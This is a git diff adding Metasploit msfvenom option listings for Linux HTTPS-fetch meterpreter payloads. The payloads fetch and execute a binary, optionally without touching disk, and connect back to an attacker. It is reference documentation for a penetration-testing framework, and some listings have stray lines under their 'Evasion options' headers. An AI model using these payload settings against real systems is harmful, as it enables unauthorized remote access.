piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CrfpshHaCU no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_sctp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_sctp.txt new file mode 100644 index 0000000..f80f575 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_sctp.txt @@ -0,0 +1,108 @@ + + Name: HTTPS Fetch, Reverse SCTP Stager + Module: payload/cmd/linux/https/x64/meterpreter/reverse_sctp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + +Evasion options for payload/cmd/linux/https/x64/meterpreter/reverse_sctp: +========================= + +man@sempervictus> + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME xbmVmIaMlDxy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..7ceaa68 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter-reverse_tcp.txt @@ -0,0 +1,107 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x64/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 116 + +Evasion options for payload/cmd/linux/https/x64/meterpreter/reverse_tcp: +========================= + + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME UjLUgAiFVlch no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_http.txt new file mode 100644 index 0000000..7584702 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_http.txt @@ -0,0 +1,108 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x64/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x64/meterpreter_reverse_http: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WNUGZeWJMKBe no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_https.txt new file mode 100644 index 0000000..00b43ff --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_https.txt @@ -0,0 +1,110 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x64/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x64/meterpreter_reverse_https: +========================= + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME WvlrifNZqe no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..298028c --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x64/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x64/meterpreter_reverse_tcp: +========================= + + + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME BLSXCKxvN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + 